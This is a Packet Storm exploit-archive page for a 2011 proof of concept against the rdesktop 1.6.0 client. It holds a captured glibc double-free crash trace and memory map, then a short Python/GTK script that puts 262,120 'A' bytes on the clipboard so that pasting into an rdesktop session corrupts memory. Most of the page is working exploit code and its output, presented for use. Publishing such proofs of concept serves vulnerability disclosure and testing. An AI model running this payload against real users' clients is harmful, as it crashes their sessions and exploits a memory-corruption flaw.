exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rdesktop 1.6.0 Memory Corruption

rdesktop 1.6.0 Memory Corruption
Posted Feb 9, 2011
Authored by badc0re

rdesktop version 1.6.0 memory corruption proof of concept exploit.

tags | exploit, proof of concept
SHA-256 | 054197abce8716778bf6a23bb2c4fe04790e5a39732a5602c0b3cd136e0d4c68

rdesktop 1.6.0 Memory Corruption

Change Mirror Download
#rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC
#By Dame Jovanoski (badc0re)
#
# This is the result of 262120 inserted into clipboard and coppied on remote machine
# using rdesktop 1.6.0 tested od Ubuntu 9.10.
#
# Use of this exploit: python rdeskop.py.
#
# And next is shift-insert(or ctrl-v) for copy.
#
# This is what you get:
#
#root@bt:~# rdesktop 192.168.204.133
#WARNING: Remote desktop does not support colour depth 24; falling back to 16
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***
#======= Backtrace: =========
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]
##/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]
#rdesktop[0x805f43f]
#rdesktop[0x805a2b6]
##rdesktop[0x80630ff]
#rdesktop[0x80636d8]
#rdesktop[0x8063848]
#rdesktop[0x8064013]
#rdesktop[0x806484b]
#rdesktop[0x80663e3]
#rdesktop[0x80672b9]
#rdesktop[0x8067dbc]
#rdesktop[0x804ec2a]
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]
#rdesktop[0x804ca61]
#======= Memory map: ========
#08048000-0807c000 r-xp 00000000 03:01 114747 /usr/bin/rdesktop
#0807c000-0807d000 r--p 00034000 03:01 114747 /usr/bin/rdesktop
#0807d000-0807f000 rw-p 00035000 03:01 114747 /usr/bin/rdesktop
#0807f000-08418000 rw-p 00000000 00:00 0 [heap]
#b7500000-b7521000 rw-p 00000000 00:00 0
#b7521000-b7600000 ---p 00000000 00:00 0
#b769b000-b771c000 rw-p 00000000 00:00 0
#b791d000-b7925000 r-xp 00000000 03:01 120953 /usr/lib/libXrender.so.1.3.0
#b7925000-b7926000 r--p 00007000 03:01 120953 /usr/lib/libXrender.so.1.3.0
#b7926000-b7927000 rw-p 00008000 03:01 120953 /usr/lib/libXrender.so.1.3.0
#b7927000-b792f000 r-xp 00000000 03:01 120903 /usr/lib/libXcursor.so.1.0.2
#b792f000-b7930000 rw-p 00007000 03:01 120903 /usr/lib/libXcursor.so.1.0.2
#b7933000-b7940000 r-xp 00000000 03:01 105519 /lib/libgcc_s.so.1
#b7940000-b7941000 r--p 0000c000 03:01 105519 /lib/libgcc_s.so.1
#b7941000-b7942000 rw-p 0000d000 03:01 105519 /lib/libgcc_s.so.1
#b7942000-b794c000 r-xp 00000000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794c000-b794d000 r--p 00009000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794d000-b794e000 rw-p 0000a000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794e000-b7957000 r-xp 00000000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7957000-b7958000 r--p 00008000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7958000-b7959000 rw-p 00009000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7959000-b796e000 r-xp 00000000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796e000-b796f000 r--p 00014000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796f000-b7970000 rw-p 00015000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so
#b7970000-b7972000 rw-p 00000000 00:00 0
#b7972000-b7979000 r-xp 00000000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b7979000-b797a000 r--p 00006000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797a000-b797b000 rw-p 00007000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797b000-b797c000 rw-p 00000000 00:00 0
#b797c000-b7980000 r-xp 00000000 03:01 120909 /usr/lib/libXdmcp.so.6.0.0
#b7980000-b7981000 rw-p 00003000 03:01 120909 /usr/lib/libXdmcp.so.6.0.0
#b7981000-b7982000 rw-p 00000000 00:00 0
#b7982000-b7984000 r-xp 00000000 03:01 120891 /usr/lib/libXau.so.6.0.0
#b7984000-b7985000 rw-p 00001000 03:01 120891 /usr/lib/libXau.so.6.0.0
#b7985000-b799c000 r-xp 00000000 03:01 215752 /usr/lib/libxcb.so.1.0.0
#b799c000-b799d000 r--p 00016000 03:01 215752 /usr/lib/libxcb.so.1.0.0
#b799d000-b799e000 rw-p 00017000 03:01 215752 /usr/lib/libxcb.so.1.0.0
#b799e000-b799f000 r-xp 00000000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0
#b799f000-b79a0000 r--p 00000000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0
#b79a0000-b79a1000 rw-p 00001000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0
#b79a1000-b79a8000 r-xp 00000000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so
#b79a8000-b79a9000 r--p 00007000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so
#b79a9000-b79aa000 rw-p 00008000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so
#b79aa000-b79bf000 r-xp 00000000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79bf000-b79c0000 r--p 00014000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c0000-b79c1000 rw-p 00015000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c1000-b79c4000 rw-p 00000000 00:00 0
#b79c4000-b79d8000 r-xp 00000000 03:01 215832 /usr/lib/libz.so.1.2.3.3
#b79d8000-b79da000 rw-p 00013000 03:01 215832 /usr/lib/libz.so.1.2.3.3
#b79da000-b79dc000 r-xp 00000000 03:01 122310 /lib/tls/i686/cmov/libdl-2.8.90.so
#b79dc000-b79dd000 r--p 00001000 03:01 122310 /lib/tls/i686/cmov/libdl-2.8.90.Aborted

from struct import *
import time
import pygtk
pygtk.require('2.0')
import gtk
import sys

print "Creating expoit."
time.sleep(1)
print "Creating explot.."
time.sleep(1)
print "Creating explot..."
buf="\x41"*262120
try:
clipboard = gtk.clipboard_get()
text=clipboard.wait_for_text()
clipboard.set_text(buf)
clipboard.store()
print "String is copied into clipboard."
except:
print "String cannot be copied into clipboard."
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close